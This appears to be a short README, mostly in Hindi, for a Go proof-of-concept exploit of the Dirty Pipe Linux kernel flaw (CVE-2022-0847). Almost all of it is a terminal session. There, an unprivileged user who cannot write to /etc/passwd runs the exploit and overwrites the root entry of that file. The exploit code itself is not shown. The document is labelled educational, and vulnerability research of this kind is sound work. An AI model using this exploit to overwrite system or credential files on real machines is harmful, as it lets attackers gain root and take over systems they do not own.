
Go-आधारित प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो CVE-2022-0847 (Dirty Pipe) के लिए अप्रारंभित पाइप बफ़र्स के माध्यम से मनमानी फ़ाइल ओवरराइट को प्रदर्शित करता है; यह शैक्षिक भेद्यता अनुसंधान के लिए अभिप्रेत है।
डर्टी पाइप भेद्यता
केवल शैक्षणिक उद्देश्यों के लिए
┌──(vagrant㉿kali)-[~]
└─$ ls -al /etc/passwd
-rw-r--r-- 1 root root 3124 Mar 8 08:47 /etc/passwd
┌──(vagrant㉿kali)-[~]
└─$ head -n 1 /etc/passwd
root:x:0:0:root:/root:/usr/bin/zsh
┌──(vagrant㉿kali)-[~]
└─$ echo foo > /etc/passwd
zsh: permission denied: /etc/passwd
┌──(vagrant㉿kali)-[~]
└─$ go run main.go /etc/passwd 1 foo
2022/03/08 08:48:03 It worked
┌──(vagrant㉿kali)-[~]
└─$ head -n 1 /etc/passwd
rfoo:x:0:0:root:/root:/usr/bin/zsh